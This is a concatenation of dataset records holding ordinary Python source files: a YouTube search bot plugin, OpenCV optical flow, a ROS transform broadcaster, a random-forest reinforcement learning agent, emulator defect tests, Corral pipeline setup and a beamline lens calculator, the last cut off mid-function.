\"__main__\":\n main()\n\n","sub_path":"poison2.py","file_name":"poison2.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"49872136","text":"\"\"\"\nYouTube search.\n\nRun queries on YouTube and return results.\n\"\"\"\n\nimport requests\n\nfrom kochira import config\nfrom kochira.service import Service, background, Config, coroutine\nfrom kochira.userdata import UserData\n\nservice = Service(__name__, __doc__)\n\n\n@service.config\nclass Config(Config):\n api_key = config.Field(doc=\"Google API key.\")\n\n\n@service.command(r\"!yt (?P.+?)(?: (?P\\d+))?$\")\n@service.command(r\"youtube search(?: for)? 
(?P.+?)(?: \\((?P\\d+)\\))?\\??$\", mention=True)\n@background\ndef search(ctx, term, num: int=None):\n \"\"\"\n YouTube search.\n\n Search for the given terms on YouTube. If a number is given, it will display\n that result.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/search\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"snippet\",\n \"type\": \"video\",\n \"q\": term\n }\n ).json()\n\n results = r.get(\"items\", [])\n\n if not results:\n ctx.respond(\"Couldn't find anything matching \\\"{term}\\\".\".format(term=term))\n return\n\n if num is None:\n num = 1\n\n num -= 1\n total = len(results)\n\n if num >= total or num < 0:\n ctx.respond(\"Couldn't find anything matching \\\"{term}\\\".\".format(term=term))\n return\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/videos\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"statistics\",\n \"id\": results[num][\"id\"][\"videoId\"]\n }\n ).json()\n\n statistics, = r[\"items\"]\n statistics = statistics[\"statistics\"]\n\n ctx.respond(\"({num} of {total}) {title} (+{likes}, {views} views): http://youtu.be/{video_id}\".format(\n title=results[num][\"snippet\"][\"title\"],\n likes=statistics[\"likeCount\"],\n views=statistics[\"viewCount\"],\n video_id=results[num][\"id\"][\"videoId\"],\n num=num + 1,\n total=total\n ))\n\n@service.command(r\".*(?:youtube\\.com/watch.*v=|youtu\\.be/)(?P[a-zA-Z0-9_-]+).*\", priority=-10)\ndef lookup(ctx, video_id):\n \"\"\"\n YouTube video lookup.\n\n Look up stats for pasted YouTube video URLs.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/videos\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"snippet,statistics,contentDetails\",\n \"fields\": \"items\",\n \"id\": video_id\n }\n ).json()\n\n if not r[\"items\"]:\n return\n\n r, = r[\"items\"]\n duration = r[\"contentDetails\"][\"duration\"].lower().replace(\"p\", \"\").replace(\"t\", \"\")\n ctx.message(\"\\x02YouTube:\\x02 {title} ({duration}, +{likes}, {views} views)\".format(\n title=r[\"snippet\"][\"title\"],\n duration=duration,\n likes=r[\"statistics\"].get('likeCount', '0'),\n views=r[\"statistics\"][\"viewCount\"],\n ))\n\n","sub_path":"kochira/services/web/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"219319854","text":"# The original code taken from https://docs.opencv.org/3.4/d7/d8b/tutorial_py_lucas_kanade.html\n\nimport cv2 as cv\nimport numpy as np\nimport sys\nfrom pathlib import Path\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n cap = cv.VideoCapture(0)\n else:\n if Path(sys.argv[1]).is_file():\n file_name = sys.argv[1]\n cap = cv.VideoCapture(file_name) # Capture video from camera\n\n ret, frame1 = cap.read()\n prvs = cv.cvtColor(frame1, cv.COLOR_BGR2GRAY)\n hsv = np.zeros_like(frame1)\n hsv[..., 1] = 255\n\n while True:\n ret, frame2 = cap.read()\n if not ret: break\n next = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n\n # prev, next, flow, pyr_scale, levels, winsize, iterations, poly_n, poly_sigma, flags\n flow = cv.calcOpticalFlowFarneback(prvs, next, None, 0.5, 2, 15, 7, 5, 1.1, 0)\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n vert = ang % (np.pi / 2.0)\n vert = vert < (np.pi / 16.)\n hsv[..., 0] = ang * 180 / np.pi\n nmag = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n nmag[vert] = 0.0\n hsv[..., 2] = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n\n bgr = cv.cvtColor(hsv, 
cv.COLOR_HSV2BGR)\n\n cv.imshow('frame2', bgr)\n k = cv.waitKey(5) & 0xff\n if k == 27:\n break\n elif k == ord('s'):\n cv.imwrite('opticalfb.png', frame2)\n cv.imwrite('opticalhsv.png', bgr)\n prvs = next\n\n cap.release()\n cv.destroyAllWindows()\n","sub_path":"video_and_trackers/dense_optical_flow_script.py","file_name":"dense_optical_flow_script.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"336102266","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\nimport tf\nfrom geometry_msgs.msg import PoseStamped\n\nclass transformer:\n\tpose = PoseStamped()\n\n\tdef __init__(self, *args):\t\t\n\t\trospy.init_node('main')\n\t\trospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.pose_callback, queue_size=1)\n\t\tself.tf_broadcaster_ = tf.TransformBroadcaster()\n\t\tprint(\"Initialization Completed\")\n\t\n\tdef euler_boundary(self, angle):\n\t\tif angle >= 3.1415:\n\t\t\treturn angle - 6.283\n\t\telif angle < -3.1415:\n\t\t\treturn angle + 6.283\n\t\telse :\n\t\t\treturn angle\n\n\tdef pose_callback(self, pose):\n\t\tself.pose = pose\n\n\tdef conversion(self):\n\t\trpy = tf.transformations.euler_from_quaternion([self.pose.pose.orientation.x,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.y,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.z,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.w])\n\t\t#print(\"E\",self.euler_boundary(rpy[0]),\" \",self.euler_boundary(rpy[1]),\" \",self.euler_boundary(rpy[2]))\n\t\t#transform quaternion to euler angle just in case you want to rotate your robot model\n\t\tq = tf.transformations.quaternion_from_euler(self.euler_boundary(rpy[0]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.euler_boundary(rpy[1]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.euler_boundary(rpy[2]))\n\t\tself.tf_broadcaster_.sendTransform((self.pose.pose.position.x, self.pose.pose.position.y, self.pose.pose.position.z), \n\t\t\t\t\t\t\t\t\t\t q,\n\t\t\t\t\t\t\t\t\t\t\trospy.Time.now(),\n\t\t\t\t\t\t\t\t\t\t\t'robot_link',\n\t\t\t\t\t\t\t\t\t\t\t'map')\n\t\t\n\nif __name__ == '__main__':\n\n\tmiddle_man = transformer()\n\trate = rospy.Rate(10)\n\twhile not rospy.is_shutdown():\n\t\ttry:\n\t\t\tmiddle_man.conversion()\n\t\t\t#middle_man.rebroadcast()\n\t\texcept (tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\tcontinue\n","sub_path":"script/pose_to_tf.py","file_name":"pose_to_tf.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"55384457","text":"from bin import Parameter\nimport numpy as np\nfrom numpy.random import choice, random\nimport os\nfrom bin.Util import normalization\nfrom sklearn.ensemble import RandomForestRegressor\n\nclass Agent:\n def __init__(self, PnumActions, epsilon, inputDim, algorithm, Parrallel):\n self.projectionFunction = None\n self.loss = []\n self.Actions = list(np.arange(0, PnumActions, 1, np.int))\n self.p = list(np.ones((PnumActions,)) * (1.0 / PnumActions))\n self.numActions = PnumActions\n self.epsilon = epsilon\n self.algorithm = algorithm\n self.incrementalGain = (Parameter.vmax - Parameter.vmin) / (Parameter.numAtoms - 1)\n self.distribution = np.arange(Parameter.vmin, Parameter.vmax + 1, self.incrementalGain, np.float)\n self.TrainFunction = None\n self.Forest = None\n # testing Block: TrainFunction\n if algorithm == \"fitted_Q\":\n self.initialValue = 0\n if Parrallel:\n self.Forest = 
RandomForestRegressor(n_estimators=10, max_features=Parameter.svdDim, min_samples_split=3,\n min_samples_leaf=5, n_jobs=10)\n else:\n self.Forest = None\n elif algorithm == \"DRL\":\n self.initialValue = []\n import scipy.stats\n GaussianDist = scipy.stats.norm(0, 200)\n for i in range(Parameter.numAtoms):\n self.initialValue.append(GaussianDist.pdf(self.distribution[i]))\n self.initialValue = normalization(self.initialValue)\n self.initialValue = np.expand_dims(a=self.initialValue, axis=0)\n self.Forests = []\n self.proj_fun = None\n self.genNextState = None\n for i in range(Parameter.numAtoms):\n self.Forests.append(RandomForestRegressor(n_estimators=10, max_features=Parameter.svdDim,\n min_samples_split=3,\n min_samples_leaf=3, n_jobs=30))\n\n def SaveWeight(self, epoch):\n dir = os.path.abspath(os.getcwd())\n if self.algorithm == \"fitted_Q\":\n if self.Forest is None:\n Exception(\"Forest is not built\")\n import pickle\n if not os.path.exists(dir + \"/observations/Epoch \" + str(epoch)):\n os.makedirs(dir + \"/observations/Epoch \" + str(epoch))\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\", mode=\"wb\") as f:\n pickle.dump(self.Forest, f)\n elif self.algorithm == \"DRL\":\n if self.Forests is None:\n Exception(\"Forests is not built\")\n import pickle\n if not os.path.exists(dir + \"/observations/Epoch \" + str(epoch)):\n os.makedirs(dir + \"/observations/Epoch \" + str(epoch))\n for i in range(Parameter.numAtoms):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\", mode=\"wb\") as f:\n pickle.dump(self.Forests[i], f)\n\n def LoadWeight(self, epoch):\n dir = os.path.abspath(os.getcwd())\n if self.algorithm == \"fitted_Q\":\n import pickle\n if os.path.exists(dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\"):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\", mode=\"rb\") as f:\n self.Forest = pickle.load(f)\n Param = self.Forest.get_params()\n Param['n_jobs'] = 1\n self.Forest.set_params(**Param)\n else:\n Exception(\"The weight file does not exist!\")\n elif self.algorithm == \"DRL\":\n import pickle\n for i in range(Parameter.numAtoms):\n if os.path.exists(dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\"):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\", mode=\"rb\") as f:\n self.Forests[i] = pickle.load(f)\n Param = self.Forests[i].get_params()\n Param['n_jobs'] = 1\n self.Forests[i].set_params(**Param)\n else:\n Exception(\"The weight file does not exist!\")\n\n def getGreedyAction(self, state):\n input = np.transpose(a=state, axes=[1, 0])\n expectedActions = []\n for a in self.Actions:\n A = np.ones(shape=(1, 1)) * a\n t = np.concatenate([input, A], axis=-1)\n if self.algorithm == \"fitted_Q\":\n expectedActions.append(self.Forest.predict(X=t)[0])\n elif self.algorithm == \"DRL\":\n tmpdistribution = []\n for i in range(Parameter.numAtoms):\n tmpdistribution.append(self.Forests[i].predict(X=t)[0])\n tmpdistribution = np.array(tmpdistribution)\n score = np.sum(a=tmpdistribution * self.distribution, axis=0)\n expectedActions.append(score)\n expectedActions = np.array(expectedActions)\n aid = np.argmax(a=expectedActions, axis=-1)\n return aid\n\n def projection(self):\n import keras.backend as K\n import tensorflow as tf\n reward = K.placeholder(shape=(None,), dtype='float64')\n Pro_Dis = K.placeholder(shape=(None, Parameter.numAtoms), dtype='float64')\n m_prob = 
K.zeros(shape=(tf.shape(reward)[0], Parameter.numAtoms), dtype='float64')\n for j in range(Parameter.numAtoms):\n Tz = K.cast(x=K.minimum(x=K.cast(x=Parameter.vmax, dtype=\"float64\"),\n y=K.maximum(x=K.cast(x=Parameter.vmin, dtype=\"float64\"),\n y=K.cast(x=reward + Parameter.gamma * self.distribution[j],\n dtype=\"float64\"))),\n dtype='float64')\n bj = (Tz - Parameter.vmin) / self.incrementalGain\n m_l, m_u = tf.math.floor(bj), tf.math.ceil(bj)\n\n m_l_id = K.reshape(x=K.cast(x=m_l, dtype='int64'), shape=(-1, 1))\n m_u_id = K.reshape(x=K.cast(x=m_u, dtype='int64'), shape=(-1, 1))\n temp = K.reshape(x=K.arange(0, K.shape(reward)[0], 1, dtype='int64'), shape=(-1, 1))\n index_m_l = K.concatenate([temp, m_l_id], axis=-1)\n index_m_u = K.concatenate([temp, m_u_id], axis=-1)\n cond = K.equal(x=m_u, y=0)\n m_u = K.cast(x=cond, dtype='float64') + m_u\n tmp1 = Pro_Dis[:, j] * (m_u - bj)\n tmp2 = Pro_Dis[:, j] * (bj - m_l)\n m_prob = m_prob + tf.scatter_nd(indices=index_m_l, updates=tmp1,\n shape=K.cast(x=(K.shape(reward)[0], Parameter.numAtoms), dtype='int64'))\n m_prob = m_prob + tf.scatter_nd(indices=index_m_u, updates=tmp2,\n shape=K.cast(x=(K.shape(reward)[0], Parameter.numAtoms), dtype='int64'))\n return K.function([reward, Pro_Dis], [m_prob])\n\n def getAction(self, state):\n if state is None or random() < self.epsilon:\n return self.getRandomAction()\n return self.getGreedyAction(state=state)\n\n def getRandomAction(self):\n return choice(a=list(self.Actions), p=list(self.p), size=1)[0]\n\n def generateNextState(self):\n import keras.backend as K\n import tensorflow as tf\n ExpDistsForEachAction = K.placeholder(shape=(None, self.numActions, Parameter.numAtoms), dtype='float64')\n ExpDists = ExpDistsForEachAction * self.distribution\n Score = K.sum(x=ExpDists, axis=-1)\n BestActions = K.argmax(x=Score, axis=-1)\n BestAids = K.expand_dims(x=BestActions, axis=1)\n idx = K.arange(0, K.shape(Score)[0], 1, dtype=\"int64\")\n idx1 = K.expand_dims(x=idx, axis=1)\n indices = K.concatenate([idx1, BestAids], axis=-1)\n maxProbDist = tf.gather_nd(params=ExpDistsForEachAction, indices=indices)\n return K.function([ExpDistsForEachAction], [maxProbDist])\n\n def Train_And_Update(self, data, epoch, pool):\n self.TrainInFit(data=data, epoch=epoch, pool=pool)\n\n def TrainInFit(self, data, epoch, pool):\n data = np.array(data)\n randidx = np.arange(0, len(data), 1, np.int)\n from numpy.random import shuffle\n shuffle(randidx)\n StartStateSet = data[:, 0][randidx]\n actionSet = data[:, 1][randidx]\n rewardSet = data[:, 2][randidx]\n EndStateSet = data[:, 3][randidx]\n actionSet = np.expand_dims(a=actionSet, axis=1)\n StartStateSet = np.array(list(StartStateSet))\n StartStateSet = np.squeeze(a=StartStateSet, axis=-1)\n EndStateSet = np.array(list(EndStateSet))\n EndStateSet = np.squeeze(a=EndStateSet, axis=-1)\n trainX0 = np.concatenate([StartStateSet, actionSet], axis=-1)\n if self.algorithm == \"fitted_Q\":\n initialValue = np.zeros((len(trainX0),))\n self.Forest.fit(trainX0, initialValue)\n elif self.algorithm == \"DRL\":\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n if self.proj_fun is None:\n self.proj_fun = self.projection()\n if self.genNextState is None:\n self.genNextState = self.generateNextState()\n initialValue = np.repeat(a=self.initialValue, repeats=len(trainX0), axis=0)\n self.ParallelTrain(trainX=trainX0, labelY=initialValue, pool=pool)\n print(\"Training:\" + str(6 * (epoch * 0.6 + 1)) + \"epochs\")\n for e in range(min(int(6 * (epoch * 0.6 + 1)), 
Parameter.maxEpochs)):\n ExpValue1 = []\n for a in self.Actions:\n act = np.ones(shape=(len(EndStateSet), 1)) * a\n trainX1 = np.concatenate([EndStateSet, act], axis=-1)\n expValue1 = self.Predict(X=trainX1, pool=pool)\n ExpValue1.append(expValue1)\n if self.algorithm == \"fitted_Q\":\n ExpValue1 = np.transpose(a=ExpValue1, axes=[1, 0])\n maxValue1 = np.max(a=ExpValue1, axis=-1)\n labelValue0 = rewardSet + Parameter.gamma * maxValue1\n self.Forest.fit(trainX0, labelValue0)\n elif self.algorithm == \"DRL\":\n ExpDist = np.transpose(a=ExpValue1, axes=[1, 0, 2])\n maxProbDist = self.genNextState([ExpDist])[0]\n labelDist = self.proj_fun([rewardSet, maxProbDist])[0]\n labelDist = normalization(labelDist)\n self.ParallelTrain(trainX=trainX0, labelY=labelDist, pool=pool)\n\n print(\"Finishing Training\")\n\n def ParallelTrain(self, trainX, labelY, pool):\n args1 = []\n for i in range(Parameter.numAtoms):\n args1.append([trainX, labelY[:, i], self.Forests[i], i])\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n outputs = pool.map(func=MultiProcessTrainingForest, iterable=args1)\n for forest, idx in outputs:\n self.Forests[idx] = forest\n\n def Predict(self, X, pool):\n if self.algorithm == \"fitted_Q\":\n return self.Forest.predict(X)\n elif self.algorithm == \"DRL\":\n args = []\n for i in range(Parameter.numAtoms):\n args.append([X, self.Forests[i], i])\n from bin.MultiProcessSimulation import MultiPredict\n outputs = pool.map(func=MultiPredict, iterable=args)\n value = []\n for i in range(Parameter.numAtoms):\n for output in outputs:\n if output[1] == i:\n value.append(output[0])\n value = np.transpose(a=value, axes=[1, 0])\n value = normalization(value)\n return value\n\n def TrainInFitBypsrModel(self, data, epoch, pool, psrModel):\n data = np.array(data)\n randidx = np.arange(0, len(data), 1, np.int)\n from numpy.random import shuffle\n shuffle(randidx)\n StartStateSet = data[:, 0][randidx]\n actionSet = data[:, 1][randidx]\n rewardSet = data[:, 2][randidx]\n EndStateSet = data[:, 3][randidx]\n actionSet = np.expand_dims(a=actionSet, axis=1)\n StartStateSet = np.array(list(StartStateSet))\n StartStateSet = np.squeeze(a=StartStateSet, axis=-1)\n EndStateSet = np.array(list(EndStateSet))\n EndStateSet = np.squeeze(a=EndStateSet, axis=-1)\n trainX0 = np.concatenate([StartStateSet, actionSet], axis=-1)\n if self.algorithm == \"fitted_Q\":\n initialValue = np.zeros((len(trainX0),))\n self.Forest.fit(trainX0, initialValue)\n elif self.algorithm == \"DRL\":\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n if self.proj_fun is None:\n self.proj_fun = self.projection()\n if self.genNextState is None:\n self.genNextState = self.generateNextState()\n initialValue = np.repeat(a=self.initialValue, repeats=len(trainX0), axis=0)\n self.ParallelTrain(trainX=trainX0, labelY=initialValue, pool=pool)\n print(\"training:\" + str(6 * (epoch * 0.6 + 1)) + \"epoches\")\n for e in range(min(int(6 * (epoch * 0.6 + 1)), Parameter.maxEpochs)):\n ExpValue1 = []\n for a in self.Actions:\n act = np.ones(shape=(len(EndStateSet), 1)) * a\n trainX1 = np.concatenate([EndStateSet, act], axis=-1)\n expValue1 = self.Predict(X=trainX1, pool=pool)\n ExpValue1.append(expValue1)\n if self.algorithm == \"fitted_Q\":\n ExpValue1 = np.transpose(a=ExpValue1, axes=[1, 0])\n maxValue1 = np.max(a=ExpValue1, axis=-1)\n labelValue0 = rewardSet + Parameter.gamma * maxValue1\n self.Forest.fit(trainX0, labelValue0)\n elif self.algorithm == \"DRL\":\n ExpDist = np.transpose(a=ExpValue1, axes=[1, 0, 2])\n 
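# Descriptive note (added): ExpDist has shape (batch, n_actions, n_atoms).\n                # genNextState picks, per sample, the distribution of the action with the\n                # highest expected value under self.distribution, and proj_fun applies the\n                # categorical (C51-style) Bellman projection: each support atom z_j is\n                # mapped to clip(reward + gamma * z_j, vmin, vmax) and its probability is\n                # split linearly between the two nearest atoms.\n                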
maxProbDist = self.genNextState([ExpDist])[0]\n labelDist = self.proj_fun([rewardSet, maxProbDist])[0]\n labelDist = normalization(labelDist)\n self.ParallelTrain(trainX=trainX0, labelY=labelDist, pool=pool)\n print(\"Finishing Training\")","sub_path":"bin/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":14395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"526617128","text":"#------------------------------------------------------------------------------\n# Mach-8: The Virtual Machinery Playpen \n#\n# blackchip.org, Inspired by the Vintage Computer Club. \n# All rites reversed (K) 2011, Reprint what you like.\n#\n# $Id: test_mach8_3_2_2.py 148 2012-03-22 02:29:57Z mcgann $\n#------------------------------------------------------------------------------\nfrom mach8 import monitor\nfrom mach8.assembly import *\nfrom mach8_test import suite\nfrom mach8_test.harness import execution\n\nclass TestDefects_3_2_2(execution.TestHarness):\n \n def test_meta_cleared(self):\n \"\"\"\n === Defect ===\n Incorrect disassembly display when assembling demo segment after \n asm.fib was loaded. \n \n === Steps to reproduce ===\n l('asm.fib')\n a.position = 0x2000 \n a(ldx_imm, 0x00) \n a(ldy_imm, 0x30) \n a(jsr, 'STROUT') \n a(rts)\n d(0x2000, 0x2007) \n\n === Incorrect output === \n PROGRAM_START:\n $2000: a2 00 ldx #$00\n $2002: a0 30 ldy #fib.acc\n $2004: 20 15 07 jsr STROUT\n $2007: 60 rts\n \n === Correct output === \n $2002: a0 30 ldy #$30\n \n === Reason ===\n Assembler does not set _new_position to True when PC advanced during\n a normal assembly operation. \n \"\"\"\n\n from asm import fib\n a = self.a\n fib.assemble(a) \n \n a.position = 0x2000 \n a(ldx_imm, 0x00) \n a(ldy_imm, 0x30) \n a(jsr, 'STROUT') \n a(rts)\n \n result = self.d.dump(0x2000, 0x2007)\n lines = result.splitlines()\n self.assertEquals('$2002: a0 30 ldy #$30', lines[2].lstrip())\n\n def test_clear_binary_flag_on_load(self):\n \"\"\"\n === Defect ===\n Programs may raise an InvalidBCDNumberError trap after running \n 'asm.fib'\n \n === Steps to reproduce ===\n mach8> l('asm.fib')\n mach8> r\n mach8> l('asm.hello')\n mach8> r\n \n === Incorrect execution ===\n InvalidBCDNumberError trap raised. \n \n === Correct execution ===\n Prints 'Hello world!'\n \n === Reason ===\n D flag needs to be cleared when loading a new program. Corrective\n action for now is to clear the flag at the end of asm.fib, but this\n needs to be fixed later. A bug in the test suite is preventing proper\n testing at the moment. \n \"\"\"\n suite.banner(self.test_clear_binary_flag_on_load) \n \n sh = monitor.Shell(self.comp) \n sh.l('asm.fib')\n sh.r()\n sh.l('asm.hello')\n sh.r()\n \n def test_d_flag_cleared_on_reset(self):\n \"\"\"\n === Defect === \n An InvalidBCDNumberError trap raised on reset if D flag is set. \n \n === Steps to reproduce ===\n mach8> cpu.d = True\n mach8> z\n \n === Reason ===\n Flag must be cleared in the initialization routines. 
\n \"\"\"\n suite.banner(self.test_d_flag_cleared_on_reset)\n \n self.cpu.d = True\n self.run_test() \n \n \n \n\n\n","sub_path":"tests/mach8_test/defects/test_mach8_3_2_2.py","file_name":"test_mach8_3_2_2.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"585003403","text":"import configs\nfrom modules.agent import AgentModule\nfrom modules.game import GameModule\nimport torch\nimport numpy as np\n\nagent = torch.load('latest.pt')\nagent.train(False)\n\nfor i in range(10):\n agent.reset()\n\n config = configs.default_game_config._replace(batch_size=1)\n\n num_agents = np.random.randint(2, 3+1)\n num_landmarks = np.random.randint(3, 3+1)\n game = GameModule(config, num_agents, num_landmarks)\n\n _, timesteps = agent(game)\n\n '''\n This visualizes the trajectories of agents (circles) and target locations (crosses).\n It also displays the communication symbol usage. Basically, alpha channel of a letter represents\n how much the the agent was using the i-th symbol during the epoch (on each step\n communication is done by a [1, 20] float vector). I sum all these vectors through all steps.\n '''\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots()\n ax.set_xticks([])\n ax.set_yticks([])\n colors = ['red', 'green', 'blue']\n agent_markers = ['o', '^']\n landmark_markers = ['P', '*']\n utterances = np.zeros_like(timesteps[0]['utterances'][0].detach())\n for time, timestep in enumerate(timesteps):\n agent_legends = []\n for idx, point in enumerate(timestep['locations'][0][:num_agents]):\n agent_legends.append(\n plt.scatter(*list(point.detach().numpy()), \n color=colors[int(game.physical[0, idx, 0].item())], \n marker=agent_markers[int(game.physical[0, idx, 1].item())],\n s=20, alpha=0.75)\n )\n for idx, point in enumerate(timestep['locations'][0][-num_landmarks:]):\n if time == 0:\n plt.scatter(*list(point.detach().numpy()), \n color='dark'+colors[int(game.physical[0, idx, 0].item())], \n marker=landmark_markers[int(game.physical[0, idx, 1].item())],\n s=300, alpha=0.75)\n utterances = utterances + timestep['utterances'][0].detach().numpy()\n # this controls how much we highlight or supress non-freqent symbol when displaying\n # pow < 1 helps to bring in the low freqent symbols that were emitted once and lost in sum\n # pow >=1 can highlight some important symbols through the epoch if it is too noisy\n utterances = np.power(utterances / utterances.max(axis=1)[..., np.newaxis], 0.25)\n for agent_idx in range(utterances.shape[0]):\n for symbol_idx in range(utterances.shape[1]):\n plt.text(0, 1 + 0.01 + 0.05 * agent_idx, str(agent_idx + 1) + ': ',\n color=colors[int(game.physical[0, agent_idx, 0].item())],\n transform=ax.transAxes)\n plt.text(0.05 + 0.03 * symbol_idx, 1 + 0.01 + 0.05 * agent_idx, \n 'ABCDEFGHIJKLMNOPQRSTUVXYZ1234567890'[symbol_idx], \n alpha=utterances[agent_idx, symbol_idx], \n color=colors[int(game.physical[0, agent_idx, 0].item())],\n transform=ax.transAxes)\n plt.legend(reversed(agent_legends), reversed([str(i + 1) for i in range(len(agent_legends))]),\n bbox_to_anchor=(0, 1.15))\n plt.show()","sub_path":"old_code/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"513268446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport atexit\nimport inspect\nimport logging\n\nfrom .conf import settings\nfrom . 
import util, exceptions\n\n\n# =============================================================================\n# CONFIGURATION\n# =============================================================================\n\nclass PipelineSetup(object):\n\n @staticmethod\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, \"_instance\"):\n cls._instance = super(\n PipelineSetup, cls).__new__(cls, *args, **kwargs)\n return cls._instance\n\n def default_setup(self):\n logging.basicConfig(format=settings.LOG_FORMAT)\n\n level = settings.LOG_LEVEL\n\n logging.getLogger(\"Corral\").setLevel(level)\n\n # http://docs.sqlalchemy.org/en/rel_1_0/core/engines.html\n logging.getLogger('sqlalchemy.engine').setLevel(level)\n for k, v in logging.Logger.manager.loggerDict.items():\n if isinstance(v, logging.Logger):\n if k.startswith(\"alembic\"):\n v.setLevel(level)\n\n def setup(self):\n self.default_setup()\n\n def teardown(self):\n pass # pragma: no cover\n\n\n# =============================================================================\n# FUNC\n# =============================================================================\n\ndef load_pipeline_setup():\n import_string = settings.PIPELINE_SETUP\n cls = util.dimport(import_string)\n if not (inspect.isclass(cls) and issubclass(cls, PipelineSetup)):\n msg = (\n \"PIPELINE_SETUP '{}' must be subclass of \"\n \"'corral.pipeline.PipelineSetup'\").format(import_string)\n raise exceptions.ImproperlyConfigured(msg)\n return cls\n\n\ndef setup_pipeline(setup_cls):\n if not (inspect.isclass(setup_cls) and\n issubclass(setup_cls, PipelineSetup)):\n msg = (\n \"PIPELINE_SETUP '{}' must be subclass of \"\n \"'corral.pipeline.PipelineSetup'\").format(setup_cls)\n raise TypeError(msg)\n st = setup_cls()\n st.setup()\n atexit.register(st.teardown)\n","sub_path":"corral/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"328686387","text":"\n\nimport numpy as np\nimport itertools\nimport logging\nfrom transfocate.lens import Lens\nfrom transfocate.lens import LensConnect\n\n\nlogger = logging.getLogger(__name__)\n\nclass TransfocatorCombo(object):\n \"\"\"Class creates and keeps track of the lens array lists and calculates the\n image of the combined xrt/tfs beryllium lens array\n\n Attributes\n ----------\n xrt : list\n A list of the xrt lenses with all the attributes of the LensConnect\n class\n tfs : list\n A list of the tfs lenses with all the attributes of the LensConnect\n class\n \"\"\"\n #define TransfocatorCombo attributes\n #Note: onely one xrt can be entered for this but multiple tfs lenses can be\n #entered\n def __init__(self, xrt, tfs):\n self.xrt=LensConnect(xrt)\n self.tfs=LensConnect(*tfs)\n\n def image(self, z_obj):\n \"\"\"Method calculates the image of the combined tfs and xrt lens array\n \n Returns\n -------\n float\n Returns the image of the xrt/tfs lens array\n \"\"\"\n #\n xrt_image=self.xrt.image(z_obj)\n total_image=self.tfs.image(xrt_image)\n logger.debug(\"the xrt image of the array is %s and the image of the combined xrt/tfs array is %s\" %(xrt_image,total_image))\n return total_image\n\n\nclass Calculator(object):\n \"\"\"Class for the transfocator beryllium lens calculator.\n\n Attributes\n ----------\n xrt_lenses : list\n A list of the xrt prefocus lenses\n tfs_lenses : list\n A list of the beryllium transfocator lenses\n xrt_limit : float \n The hard limit i.e. 
minimum effective radius that the xrt lens array can safely\n have\n tfs : float\n The hard limit i.e. maximum effective radius that tfs lense array can\n safely have\n \"\"\"\n #Define calculator variables\n #There are not xtr or tfs limits unless they are set by the signals\n def __init__(self, xrt_lenses, tfs_lenses, xrt_limit=None, tfs_limit=None):\n self.xrt_lenses=xrt_lenses\n self.tfs_lenses=tfs_lenses\n self.xrt_limit=xrt_limit\n self.tfs_limit=tfs_limit\n\n @property\n def combinations(self):\n #Note: all lens arrays will consist of one prefocus lens and an array\n #of tfs lenses\n \n \"\"\"Method calculates and returns all possible combinations of the xrt\n and tfs lense arrays\n\n Returns\n -------\n list\n Returns a list of all possible combinations of the xrt and tfs\n lense arrays\n \"\"\"\n \n #create empty lists for all possible xrt and tfs combos and all possible tfs combos\n #xrt lenses put into prefocus\n all_combo=[]\n prefocus_combo=self.xrt_lenses\n tfs_combo=[]\n\n #loop through tfs lenses from i=0 to i=length of tfs list +1\n for i in range(len(self.tfs_lenses)+1):\n #create a list z of all possile tfs lens combinations using\n #itertools\n z=list(itertools.combinations(self.tfs_lenses,i))\n 